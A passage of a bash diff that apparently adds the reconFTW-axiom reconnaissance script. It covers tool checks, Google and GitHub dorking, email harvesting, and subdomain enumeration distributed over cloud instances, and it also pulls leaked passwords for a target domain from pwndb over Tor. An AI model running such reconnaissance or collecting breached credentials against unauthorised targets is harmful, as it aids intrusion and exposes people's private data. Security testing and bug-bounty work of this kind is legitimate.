@@ -0,0 +1,1859 @@ +#!/usr/bin/env bash + +. ./reconftw.cfg + +function banner(){ + printf "\n${bgreen}" + printf " ██▀███ ▓█████ ▄████▄ ▒█████ ███▄ █ █████▒▄▄▄█████▓ █ █░\n" + printf " ▓██ ▒ ██▒▓█ ▀ ▒██▀ ▀█ ▒██▒ ██▒ ██ ▀█ █ ▓██ ▒ ▓ ██▒ ▓▒▓█░ █ ░█░\n" + printf " ▓██ ░▄█ ▒▒███ ▒▓█ ▄ ▒██░ ██▒▓██ ▀█ ██▒▒████ ░ ▒ ▓██░ ▒░▒█░ █ ░█ \n" + printf " ▒██▀▀█▄ ▒▓█ ▄ ▒▓▓▄ ▄██▒▒██ ██░▓██▒ ▐▌██▒░▓█▒ ░ ░ ▓██▓ ░ ░█░ █ ░█ \n" + printf " ░██▓ ▒██▒░▒████▒▒ ▓███▀ ░░ ████▓▒░▒██░ ▓██░░▒█░ ▒██▒ ░ ░░██▒██▓ \n" + printf " ░ ▒▓ ░▒▓░░░ ▒░ ░░ ░▒ ▒ ░░ ▒░▒░▒░ ░ ▒░ ▒ ▒ ▒ ░ ▒ ░░ ░ ▓░▒ ▒ \n" + printf " ░▒ ░ ▒░ ░ ░ ░ ░ ▒ ░ ▒ ▒░ ░ ░░ ░ ▒░ ░ ░ ▒ ░ ░ \n" + printf " ░░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ \n" + printf " ░ ░ ░░ ░ ░ ░ ░ ░ \n" + printf " ░ \n" + printf " ${reconftw_version}-axiom by @six2dez${reset}\n" +} + +############################################################################################################### +################################################### TOOLS ##################################################### +############################################################################################################### + +function check_version(){ + +eval timeout 10 git fetch $DEBUG_STD +exit_status=$? 
+if [ $exit_status -eq 0 ] +then + BRANCH=$(git rev-parse --abbrev-ref HEAD) + HEADHASH=$(git rev-parse HEAD) + UPSTREAMHASH=$(git rev-parse ${BRANCH}@{upstream}) + if [ "$HEADHASH" != "$UPSTREAMHASH" ] + then + printf "\n${yellow} There is a new version, run ./install.sh to get latest version${reset}\n\n" + fi +else + printf "\n${bred} Unable to check updates ${reset}\n\n" +fi + +} + +function tools_installed(){ + + printf "\n\n${bgreen}#######################################################################${reset}\n" + printf "${bblue} Checking installed tools ${reset}\n\n" + + allinstalled=true + + [ -n "$GOPATH" ] || { printf "${bred} [*] GOPATH var [NO]${reset}\n"; allinstalled=false;} + [ -n "$GOROOT" ] || { printf "${bred} [*] GOROOT var [NO]${reset}\n"; allinstalled=false;} + [ -n "$PATH" ] || { printf "${bred} [*] PATH var [NO]${reset}\n"; allinstalled=false;} + [ -f $tools/degoogle_hunter/degoogle.py ] || { printf "${bred} [*] degoogle [NO]${reset}\n"; allinstalled=false;} + [ -f $tools/ParamSpider/paramspider.py ] || { printf "${bred} [*] Paramspider [NO]${reset}\n"; allinstalled=false;} + [ -f $tools/brutespray/brutespray.py ] || { printf "${bred} [*] brutespray [NO]${reset}\n"; allinstalled=false;} + [ -f $tools/dnsrecon/dnsrecon.py ] || { printf "${bred} [*] dnsrecon [NO]${reset}\n"; allinstalled=false;} + [ -f $tools/fav-up/favUp.py ] || { printf "${bred} [*] fav-up [NO]${reset}\n"; allinstalled=false;} + [ -f $tools/Corsy/corsy.py ] || { printf "${bred} [*] Corsy [NO]${reset}\n"; allinstalled=false;} + [ -f $tools/testssl.sh/testssl.sh ] || { printf "${bred} [*] testssl [NO]${reset}\n"; allinstalled=false;} + [ -f $tools/CMSeeK/cmseek.py ] || { printf "${bred} [*] CMSeeK [NO]${reset}\n"; allinstalled=false;} + [ -f $tools/ctfr/ctfr.py ] || { printf "${bred} [*] ctfr [NO]${reset}\n"; allinstalled=false;} + [ -f $tools/fuzz_wordlist.txt ] || { printf "${bred} [*] OneListForAll [NO]${reset}\n"; allinstalled=false;} + [ -f 
$tools/LinkFinder/linkfinder.py ] || { printf "${bred} [*] LinkFinder [NO]${reset}\n"; allinstalled=false;}
+ [ -f $tools/GitDorker/GitDorker.py ] || { printf "${bred} [*] GitDorker [NO]${reset}\n"; allinstalled=false;}
+ [ -f $tools/degoogle_hunter/degoogle_hunter.sh ] || { printf "${bred} [*] degoogle_hunter [NO]${reset}\n"; allinstalled=false;}
+ [ -f $tools/puredns/puredns ] || { printf "${bred} [*] puredns [NO]${reset}\n"; allinstalled=false;}
+ [ -f $tools/getjswords.py ] || { printf "${bred} [*] getjswords [NO]${reset}\n"; allinstalled=false;}
+ eval type -P arjun $DEBUG_STD || { printf "${bred} [*] Arjun [NO]${reset}\n"; allinstalled=false;}
+ eval type -P dirdar $DEBUG_STD || { printf "${bred} [*] dirdar [NO]${reset}\n"; allinstalled=false;}
+ eval type -P github-endpoints $DEBUG_STD || { printf "${bred} [*] github-endpoints [NO]${reset}\n"; allinstalled=false;}
+ eval type -P github-subdomains $DEBUG_STD || { printf "${bred} [*] github-subdomains [NO]${reset}\n"; allinstalled=false;}
+ eval type -P gospider $DEBUG_STD || { printf "${bred} [*] gospider [NO]${reset}\n"; allinstalled=false;}
+ eval type -P wafw00f $DEBUG_STD || { printf "${bred} [*] wafw00f [NO]${reset}\n"; allinstalled=false;}
+ eval type -P subfinder $DEBUG_STD || { printf "${bred} [*] Subfinder [NO]${reset}\n"; allinstalled=false;}
+ eval type -P assetfinder $DEBUG_STD || { printf "${bred} [*] Assetfinder [NO]${reset}\n"; allinstalled=false;}
+ eval type -P dnsvalidator $DEBUG_STD || { printf "${bred} [*] dnsvalidator [NO]${reset}\n"; allinstalled=false;}
+ eval type -P gowitness $DEBUG_STD || { printf "${bred} [*] gowitness [NO]${reset}\n"; allinstalled=false;}
+ eval type -P findomain $DEBUG_STD || { printf "${bred} [*] Findomain [NO]${reset}\n"; allinstalled=false;}
+ eval type -P amass $DEBUG_STD || { printf "${bred} [*] Amass [NO]${reset}\n"; allinstalled=false;}
+ eval type -P crobat $DEBUG_STD || { printf "${bred} [*] Crobat [NO]${reset}\n"; allinstalled=false;}
+ eval type -P mildew $DEBUG_STD || { printf "${bred} [*] mildew [NO]${reset}\n"; allinstalled=false;}
+ eval type -P waybackurls $DEBUG_STD || { printf "${bred} [*] Waybackurls [NO]${reset}\n"; allinstalled=false;}
+ eval type -P gauplus $DEBUG_STD || { printf "${bred} [*] gauplus [NO]${reset}\n"; allinstalled=false;}
+ eval type -P dnsx $DEBUG_STD || { printf "${bred} [*] dnsx [NO]${reset}\n"; allinstalled=false;}
+ eval type -P DNScewl $DEBUG_STD || { printf "${bred} [*] DNScewl [NO]${reset}\n"; allinstalled=false;}
+ eval type -P cf-check $DEBUG_STD || { printf "${bred} [*] Cf-check [NO]${reset}\n"; allinstalled=false;}
+ eval type -P nuclei $DEBUG_STD || { printf "${bred} [*] Nuclei [NO]${reset}\n"; allinstalled=false;}
+ [ -d ~/nuclei-templates ] || { printf "${bred} [*] Nuclei templates [NO]${reset}\n"; allinstalled=false;}
+ eval type -P gf $DEBUG_STD || { printf "${bred} [*] Gf [NO]${reset}\n"; allinstalled=false;}
+ eval type -P Gxss $DEBUG_STD || { printf "${bred} [*] Gxss [NO]${reset}\n"; allinstalled=false;}
+ eval type -P subjs $DEBUG_STD || { printf "${bred} [*] subjs [NO]${reset}\n"; allinstalled=false;}
+ eval type -P ffuf $DEBUG_STD || { printf "${bred} [*] ffuf [NO]${reset}\n"; allinstalled=false;}
+ eval type -P massdns $DEBUG_STD || { printf "${bred} [*] Massdns [NO]${reset}\n"; allinstalled=false;}
+ eval type -P qsreplace $DEBUG_STD || { printf "${bred} [*] qsreplace [NO]${reset}\n"; allinstalled=false;}
+ eval type -P interlace $DEBUG_STD || { printf "${bred} [*] interlace [NO]${reset}\n"; allinstalled=false;}
+ eval type -P anew $DEBUG_STD || { printf "${bred} [*] Anew [NO]${reset}\n"; allinstalled=false;}
+ eval type -P unfurl $DEBUG_STD || { printf "${bred} [*] unfurl [NO]${reset}\n"; allinstalled=false;}
+ eval type -P crlfuzz $DEBUG_STD || { printf "${bred} [*] crlfuzz [NO]${reset}\n"; allinstalled=false;}
+ eval type -P httpx $DEBUG_STD || { printf "${bred} [*] Httpx [NO]${reset}\n${reset}"; allinstalled=false;}
+ eval type -P jq $DEBUG_STD || { printf "${bred} [*] jq [NO]${reset}\n${reset}"; allinstalled=false;}
+ eval type -P notify $DEBUG_STD || { printf "${bred} [*] notify [NO]${reset}\n${reset}"; allinstalled=false;}
+ eval type -P dalfox $DEBUG_STD || { printf "${bred} [*] dalfox [NO]${reset}\n${reset}"; allinstalled=false;}
+ eval type -P axiom-ls $DEBUG_STD || { printf "${bred} [*] axiom [NO]${reset}\n${reset}"; allinstalled=false;}
+
+ if [ "${allinstalled}" = true ] ; then
+ printf "${bgreen} Good! All installed! ${reset}\n\n"
+ else
+ printf "\n${yellow} Try running the installer script again ./install.sh"
+ printf "\n${yellow} If it fails for any reason try to install manually the tools missed"
+ printf "\n${yellow} Finally remember to set the ${bred}\$tools${yellow} variable at the start of this script"
+ printf "\n${yellow} If nothing works and the world is gonna end you can always ping me :D ${reset}\n\n"
+ fi
+
+ printf "${bblue} Tools check finished\n"
+ printf "${bgreen}#######################################################################\n${reset}"
+}
+
+###############################################################################################################
+################################################### OSINT #####################################################
+###############################################################################################################
+
+function google_dorks(){
+ if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] && [ "$GOOGLE_DORKS" = true ] && [ "$OSINT" = true ]
+ then
+ start_func "Google Dorks in process"
+ $tools/degoogle_hunter/degoogle_hunter.sh $domain | tee osint/dorks.txt
+ sed -r -i "s/\x1B\[([0-9]{1,3}(;[0-9]{1,2})?)?[mGK]//g" osint/dorks.txt
+ end_func "Results are saved in osint/dorks.txt" ${FUNCNAME[0]}
+ else
+ if [ "$GOOGLE_DORKS" = false ] || [ "$OSINT" = false ]; then
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n"
+ else
+ printf "${yellow} ${FUNCNAME[0]} are already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
+ fi
+ fi
+}
+
+function github_dorks(){
+ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$GITHUB_DORKS" = true ] && [ "$OSINT" = true ]
+ then
+ start_func "Github Dorks in process"
+ if [ -s "${GITHUB_TOKENS}" ]
+ then
+ if [ "$DEEP" = true ] ; then
+ eval python3 $tools/GitDorker/GitDorker.py -tf ${GITHUB_TOKENS} -e $GITDORKER_THREADS -q $domain -p -d $tools/GitDorker/Dorks/alldorksv3 | grep "\[+\]" | grep "git" | anew -q osint/gitdorks.txt $DEBUG_STD
+ else
+ eval python3 $tools/GitDorker/GitDorker.py -tf ${GITHUB_TOKENS} -e $GITDORKER_THREADS -q $domain -p -d $tools/GitDorker/Dorks/medium_dorks.txt | grep "\[+\]" | grep "git" | anew -q osint/gitdorks.txt $DEBUG_STD
+ fi
+ sed -r -i "s/\x1B\[([0-9]{1,3}(;[0-9]{1,2})?)?[mGK]//g" osint/gitdorks.txt
+ else
+ printf "\n${bred} Required file ${GITHUB_TOKENS} not exists or empty${reset}\n"
+ fi
+ end_func "Results are saved in osint/gitdorks.txt" ${FUNCNAME[0]}
+ else
+ if [ "$GITHUB_DORKS" = false ] || [ "$OSINT" = false ]; then
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n"
+ else
+ printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
+ fi
+ fi
+}
+
+function metadata(){
+ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$METADATA" = true ] && [ "$OSINT" = true ]
+ then
+ start_func "Scanning metadata in public files"
+ eval metafinder -d $domain -l 20 -o osint -go -bi -ba $DEBUG_STD
+ eval mv osint/${domain}/* osint/ $DEBUG_ERROR
+ eval rmdir osint/${domain} $DEBUG_ERROR
+ end_func "Results are saved in osint/[software/authors/metadata_results].txt" ${FUNCNAME[0]}
+ else
+ if [ "$METADATA" = false ] || [ "$OSINT" = false ]; then
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n"
+ else
+ printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
+ fi
+ fi
+}
+
+function emails(){
+ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$EMAILS" = true ] && [ "$OSINT" = true ]
+ then
+ start_func "Searching emails/users/passwords leaks"
+ cd $tools/theHarvester
+ eval python3 theHarvester.py -d $domain -b all $DEBUG_ERROR > $dir/.tmp/harvester.txt
+ cd $dir
+ cat .tmp/harvester.txt | awk '/Emails/,/Hosts/' | sed -e '1,2d' | head -n -2 | sed -e '/Searching /d' -e '/exception has occurred/d' -e '/found:/Q' | anew -q osint/emails.txt
+ cat .tmp/harvester.txt | awk '/Users/,/IPs/' | sed -e '1,2d' | head -n -2 | sed -e '/Searching /d' -e '/exception has occurred/d' -e '/found:/Q' | anew -q osint/users.txt
+ cat .tmp/harvester.txt | awk '/Links/,/Users/' | sed -e '1,2d' | head -n -2 | sed -e '/Searching /d' -e '/exception has occurred/d' -e '/found:/Q' | anew -q osint/linkedin.txt
+
+ eval h8mail -t $domain -q domain --loose -c $tools/h8mail_config.ini -j .tmp/h8_results.json $DEBUG_STD
+ if [ -s ".tmp/h8_results.json" ]
+ then
+ cat .tmp/h8_results.json | jq -r '.targets[0] | .data[] | .[]' | cut -d '-' -f2 | anew -q osint/h8mail.txt
+ fi
+
+ PWNDB_STATUS=$(timeout 15s curl -Is --socks5-hostname localhost:9050 http://pwndb2am4tzkvold.onion | grep HTTP | cut -d ' ' -f2)
+
+ if [ "$PWNDB_STATUS" = 200 ]
+ then
+ cd $tools/pwndb
+ python3 pwndb.py --target "@${domain}" | sed '/^[-]/d' | anew -q $dir/osint/passwords.txt
+ cd $dir
+ sed -r -i "s/\x1B\[([0-9]{1,3}(;[0-9]{1,2})?)?[mGK]//g" osint/passwords.txt
+ else
+ text="${yellow}\n pwndb is currently down :(\n\n Check xjypo5vzgmo7jca6b322dnqbsdnp3amd24ybx26x5nxbusccjkm4pwid.onion${reset}\n"
+ printf "${text}" && printf "${text}" | $NOTIFY
+ fi
+ end_func "Results are saved in osint/[emails/users/h8mail/passwords].txt" ${FUNCNAME[0]}
+ else
+ if [ "$EMAILS" = false ] || [ "$OSINT" = false ]; then
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n"
+ else
+ printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
+ fi
+
+ fi
+}
+
+function domain_info(){
+ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$DOMAIN_INFO" = true ] && [ "$OSINT" = true ]
+ then
+ start_func "Searching domain info (whois, registrant name/email domains)"
+ lynx -dump https://domainbigdata.com/${domain} | tail -n +19 > osint/domain_info_general.txt
+
+ cat osint/domain_info_general.txt | grep '/nj/' | tr -s ' ' ',' | cut -d ',' -f3 > .tmp/domain_registrant_name.txt
+ cat osint/domain_info_general.txt | grep '/mj/' | tr -s ' ' ',' | cut -d ',' -f3 > .tmp/domain_registrant_email.txt
+ cat osint/domain_info_general.txt | grep -E "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" | grep "https://domainbigdata.com" | tr -s ' ' ',' | cut -d ',' -f3 > .tmp/domain_registrant_ip.txt
+
+ sed -i -n '/Copyright/q;p' osint/domain_info_general.txt
+
+ if [ -s ".tmp/domain_registrant_name.txt" ]
+ then
+ for line in $(cat .tmp/domain_registrant_name.txt); do
+ lynx -dump $line | tail -n +18 | sed -n '/]domainbigdata.com/q;p' >> osint/domain_info_name.txt && echo -e "\n\n#######################################################################\n\n" >> osint/domain_info_name.txt
+ done
+ fi
+
+ if [ -s ".tmp/domain_registrant_email.txt" ]
+ then
+ for line in $(cat .tmp/domain_registrant_email.txt); do
+ lynx -dump $line | tail -n +18 | sed -n '/]domainbigdata.com/q;p' >> osint/domain_info_email.txt && echo -e "\n\n#######################################################################\n\n" >> osint/domain_info_email.txt
+ done
+ fi
+
+ if [ -s ".tmp/domain_registrant_ip.txt" ]
+ then
+ for line in $(cat .tmp/domain_registrant_ip.txt); do
+ lynx -dump $line | tail -n +18 | sed -n '/]domainbigdata.com/q;p' >> osint/domain_info_ip.txt && echo -e "\n\n#######################################################################\n\n" >> osint/domain_info_ip.txt
+ done
+ fi
+ end_func "Results are saved in osint/domain_info_[general/name/email/ip].txt" ${FUNCNAME[0]}
+ else
+ if [ "$DOMAIN_INFO" = false ] || [ "$OSINT" = false ]; then
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n"
+ else
+ printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
+ fi
+ fi
+}
+
+
+###############################################################################################################
+############################################### SUBDOMAINS ####################################################
+###############################################################################################################
+
+function subdomains_full(){
+ NUMOFLINES_subs="0"
+ NUMOFLINES_probed="0"
+ printf "${bgreen}#######################################################################\n\n"
+ printf "${bblue} Subdomain Enumeration\n\n"
+ if [ -f "subdomains/subdomains.txt" ]
+ then
+ eval cp subdomains/subdomains.txt .tmp/subdomains_old.txt $DEBUG_ERROR
+ fi
+ if [ -f "webs/webs.txt" ]
+ then
+ eval cp webs/webs.txt .tmp/probed_old.txt $DEBUG_ERROR
+ fi
+
+ if [ "$update_resolvers" = true ]
+ then
+ notification "Updating resolvers lists..." warn
+ axiom-exec 'if [ \$(find "/home/op/lists/resolvers.txt" -mtime +1 -print) ] || [ \$(cat /home/op/lists/resolvers.txt | wc -l) -le 40 ] ; then dnsvalidator -tL https://public-dns.info/nameservers.txt -threads 100 -o /home/op/lists/resolvers.txt ; cp /home/op/lists/resolvers.txt /home/op/recon/puredns/resolvers.txt; fi' &>/dev/null
+ notification "Updated" good
+ fi
+
+ sub_passive
+ sub_crt
+ sub_active
+ sub_brute
+ sub_permut
+ if [ "$DEEP" = true ] ; then
+ sub_recursive
+ fi
+ sub_dns
+ sub_scraping
+ webprobe_simple
+ if [ -f "subdomains/subdomains.txt" ]
+ then
+ deleteOutScoped $outOfScope_file subdomains/subdomains.txt
+ NUMOFLINES_subs=$(eval cat subdomains/subdomains.txt $DEBUG_ERROR | anew .tmp/subdomains_old.txt | wc -l)
+ fi
+ if [ -f "webs/webs.txt" ]
+ then
+ deleteOutScoped $outOfScope_file webs/webs.txt
+ NUMOFLINES_probed=$(eval cat webs/webs.txt $DEBUG_ERROR | anew .tmp/probed_old.txt | wc -l)
+ fi
+ printf "${bblue}\n Total subdomains: ${reset}\n\n"
+ notification "- ${NUMOFLINES_subs} new alive subdomains" good
+ eval cat subdomains/subdomains.txt $DEBUG_ERROR | sort
+ notification "- ${NUMOFLINES_probed} new web probed" good
+ eval cat webs/webs.txt $DEBUG_ERROR | sort
+ notification "Subdomain Enumeration Finished" good
+ printf "${bblue} Results are saved in subdomains/subdomains.txt and webs/webs.txt${reset}\n"
+ printf "${bgreen}#######################################################################\n\n"
+}
+
+function sub_passive(){
+ if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]
+ then
+ start_subfunc "Running : Passive Subdomain Enumeration"
+ echo "/home/op/go/bin/subfinder -d ${domain}" > .tmp/sub_passive_commands.txt
+ echo "/home/op/go/bin/assetfinder --subs-only ${domain}" >> .tmp/sub_passive_commands.txt
+ echo "amass enum -passive -d ${domain}" >> .tmp/sub_passive_commands.txt
+ echo "/usr/bin/findomain --quiet -t ${domain}" >> .tmp/sub_passive_commands.txt
+ echo "timeout 10m /home/op/go/bin/waybackurls ${domain} | /home/op/go/bin/unfurl --unique domains" >> .tmp/sub_passive_commands.txt
+ echo "timeout 10m /home/op/go/bin/gau ${domain} | /home/op/go/bin/unfurl --unique domains" >> .tmp/sub_passive_commands.txt
+ eval axiom-scan .tmp/sub_passive_commands.txt -m exec -o .tmp/axiom_psub.txt $DEBUG_STD
+ eval crobat -s $domain $DEBUG_ERROR | anew -q .tmp/crobat_psub.txt
+ if [ -s "${GITHUB_TOKENS}" ];then
+ if [ "$DEEP" = true ] ; then
+ eval github-subdomains -d $domain -t $GITHUB_TOKENS -o .tmp/github_subdomains_psub.txt $DEBUG_STD
+ else
+ eval github-subdomains -d $domain -k -q -t $GITHUB_TOKENS -o .tmp/github_subdomains_psub.txt $DEBUG_STD
+ fi
+ fi
+ eval curl -s "https://jldc.me/anubis/subdomains/${domain}" $DEBUG_ERROR | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sed '/^\./d' | anew -q .tmp/jldc_psub.txt
+ if echo $domain | grep -q ".mil$"; then
+ mildew
+ mv mildew.out .tmp/mildew.out
+ cat .tmp/mildew.out | grep ".$domain$" | anew -q .tmp/mil_psub.txt
+ fi
+ NUMOFLINES=$(eval cat .tmp/*_psub.txt $DEBUG_ERROR | sed "s/*.//" | anew .tmp/passive_subs.txt | wc -l)
+ end_subfunc "${NUMOFLINES} new subs (passive)" ${FUNCNAME[0]}
+ else
+ printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
+ fi
+}
+
+function sub_crt(){
+ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBCRT" = true ]
+ then
+ start_subfunc "Running : Crtsh Subdomain Enumeration"
+
+ echo "python3 -u /home/op/recon/ctfr/ctfr.py -d ${domain} -o ${domain}_ctfr.txt; cat ${domain}_ctfr.txt" > .tmp/sub_ctrf_commands.txt
+ eval axiom-scan .tmp/sub_ctrf_commands.txt -m exec -o .tmp/crtsh_subs_tmp.txt $DEBUG_STD
+ eval curl "https://tls.bufferover.run/dns?q=.${domain}" $DEBUG_ERROR | eval jq -r .Results[] $DEBUG_ERROR | cut -d ',' -f3 | grep -F ".$domain" | anew -q .tmp/crtsh_subs.txt
+ eval curl "https://dns.bufferover.run/dns?q=.${domain}" $DEBUG_ERROR | eval jq -r '.FDNS_A'[],'.RDNS'[] $DEBUG_ERROR | cut -d ',' -f2 | grep -F ".$domain" | anew -q .tmp/crtsh_subs_tmp.txt
+ NUMOFLINES=$(eval cat .tmp/crtsh_subs_tmp.txt $DEBUG_ERROR | sed "s/*.//" | anew .tmp/crtsh_subs.txt | wc -l)
+ end_subfunc "${NUMOFLINES} new subs (cert transparency)" ${FUNCNAME[0]}
+ else
+ if [ "$SUBCRT" = false ]; then
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n"
+ else
+ printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
+ fi
+ fi
+}
+
+function sub_active(){
+ if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]
+ then
+ start_subfunc "Running : Active Subdomain Enumeration"
+ if [ -s "${inScope_file}" ]
+ then
+ cat ${inScope_file} .tmp/inscope_subs.txt
+ fi
+ cat .tmp/*_subs.txt | anew -q .tmp/subs_no_resolved.txt
+ deleteOutScoped $outOfScope_file .tmp/subs_no_resolved.txt
+ eval axiom-scan .tmp/subs_no_resolved.txt -m puredns-resolve -o .tmp/subdomains_tmp.txt $DEBUG_STD
+ echo $domain | dnsx -silent -retry 3 | anew -q .tmp/subdomains_tmp.txt
+ NUMOFLINES=$(eval cat .tmp/subdomains_tmp.txt $DEBUG_ERROR | grep "$domain$" | anew subdomains/subdomains.txt | wc -l)
+ end_subfunc "${NUMOFLINES} new subs (active resolution)" ${FUNCNAME[0]}
+ else
+ printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
+ fi
+}
+
+function sub_dns(){
+ if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]
+ then
+ start_subfunc "Running : DNS Subdomain Enumeration"
+ eval axiom-scan subdomains/subdomains.txt -m dnsx -retry 3 -silent -cname -resp -o subdomains/subdomains_cname.txt $DEBUG_STD
+ cat subdomains/subdomains_cname.txt | cut -d '[' -f2 | sed 's/.$//' | grep ".$domain$" | anew -q .tmp/subdomains_dns.txt
+ eval axiom-scan .tmp/subdomains_dns.txt -m puredns-resolve -o .tmp/subdomains_dns_resolved.txt $DEBUG_STD
+ NUMOFLINES=$(eval cat .tmp/subdomains_dns_resolved.txt $DEBUG_ERROR | grep ".$domain$" |anew subdomains/subdomains.txt | wc -l)
+ end_subfunc "${NUMOFLINES} new subs (dns resolution)" ${FUNCNAME[0]}
+ else
+ printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
+ fi
+}
+
+function sub_brute(){
+ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBBRUTE" = true ]
+ then
+ start_subfunc "Running : Bruteforce Subdomain Enumeration"
+ if [ "$DEEP" = true ] ; then
+ eval axiom-scan $subs_wordlist_big -m puredns-single $domain -o .tmp/subs_brute.txt $DEBUG_STD
+ else
+ eval axiom-scan $subs_wordlist -m puredns-single $domain -o .tmp/subs_brute.txt $DEBUG_STD
+ fi
+ NUMOFLINES=$(eval cat .tmp/subs_brute.txt $DEBUG_ERROR | sed "s/*.//" | grep ".$domain$" |anew subdomains/subdomains.txt | wc -l)
+ end_subfunc "${NUMOFLINES} new subs (bruteforce)" ${FUNCNAME[0]}
+ else
+ if [ "$SUBBRUTE" = false ]; then
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n"
+ else
+ printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
+ fi
+ fi
+}
+
+function sub_scraping(){
+ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBSCRAPING" = true ]
+ then
+ start_subfunc "Running : Source code scraping subdomain search"
+ touch .tmp/scrap_subs.txt
+ eval axiom-scan subdomains/subdomains.txt -m httpx -follow-host-redirects -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color -o .tmp/probed_tmp_scrap1.txt $DEBUG_STD && cat .tmp/probed_tmp_scrap1.txt | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp_scrap.txt
+ eval axiom-scan .tmp/probed_tmp_scrap.txt -m httpx -csp-probe -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color -o .tmp/probed_tmp_scrap2.txt $DEBUG_STD && cat .tmp/probed_tmp_scrap2.txt | cut -d ' ' -f1 | grep ".$domain$" | anew .tmp/probed_tmp_scrap.txt | unfurl -u domains | anew -q .tmp/scrap_subs.txt
+ eval axiom-scan .tmp/probed_tmp_scrap.txt -m httpx -tls-grab -tls-probe -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color -o .tmp/probed_tmp_scrap3.txt $DEBUG_STD && cat .tmp/probed_tmp_scrap3.txt | cut -d ' ' -f1 | grep ".$domain$" | anew .tmp/probed_tmp_scrap.txt | unfurl -u domains | anew -q .tmp/scrap_subs.txt
+ if [ "$DEEP" = true ] ; then
+ eval axiom-scan .tmp/probed_tmp_scrap.txt -m gospider --js -d 3 --sitemap --robots -w -r -o .tmp/gospider $DEBUG_STD
+ else
+ eval axiom-scan .tmp/probed_tmp_scrap.txt -m gospider --js -d 2 --sitemap --robots -w -r -o .tmp/gospider $DEBUG_STD
+ fi
+ cat .tmp/gospider/* | sed '/^.\{2048\}./d' | anew -q .tmp/gospider.txt
+ cat .tmp/gospider.txt | egrep -o 'https?://[^ ]+' | sed 's/]$//' | unfurl --unique domains | grep ".$domain$" | anew -q .tmp/scrap_subs.txt
+ eval axiom-scan .tmp/scrap_subs.txt -m puredns-resolve -o .tmp/scrap_subs_resolved.txt $DEBUG_STD
+ NUMOFLINES=$(eval cat .tmp/scrap_subs_resolved.txt $DEBUG_ERROR | grep ".$domain$" |anew subdomains/subdomains.txt | tee .tmp/diff_scrap.txt | wc -l)
+ eval axiom-scan .tmp/diff_scrap.txt -m httpx -follow-host-redirects -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color -o .tmp/probed_tmp_scrap4.txt $DEBUG_STD && eval cat .tmp/probed_tmp_scrap4.txt $DEBUG_ERROR | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp_scrap.txt
+ end_subfunc "${NUMOFLINES} new subs (code scraping)" ${FUNCNAME[0]}
+ else
+ if [ "$SUBSCRAPING" = false ]; then
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n"
+ else
+ printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
+ fi
+ fi
+}
+
+function sub_permut(){
